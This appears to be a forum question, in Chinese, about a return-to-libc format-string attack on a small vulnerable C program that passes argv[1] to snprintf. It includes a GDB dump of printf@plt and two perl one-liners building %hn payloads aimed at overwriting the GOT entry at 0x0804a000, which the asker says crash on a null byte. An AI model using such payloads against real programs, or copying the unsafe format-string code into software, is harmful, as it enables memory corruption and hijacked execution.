我正在尝试执行一个返回到libc格式的字符串攻击,但我想要写入的地址(0x0804a000)中有一个空字节! 我必须将我的格式字符串读入snprintf中,以便空字节导致它随机失效并Segfaults。
buf[70];
snprintf(buf, 80, argv[1]);
printf(buf);
这是printf@plt的GDB转储:
(gdb) disassem 0x080483c0
Dump of assembler code for function printf@plt:
0x080483c0 <+0>: jmp *0x804a000
0x080483c6 <+6>: push $0x0
0x080483cb <+11>: jmp 0x80483b0
End of assembler dump.
有人有什么想法吗?
我现在的方法是这样运行的
./program `perl -e 'print "sh;#\x00\xa0\x04\x08%12345x%10$hn"'`
但是有一个空字节。我也尝试过
./program `perl -e 'print "sh;#\xff\x9f\x04\x08\x00\xa0\x04\x08%12345x%10$hn%12345x%11$hn"'`
但是在0x0804a000
之前的地址中,有全局偏移表,因此在返回调用它的函数之前,snprintf就会导致段错误。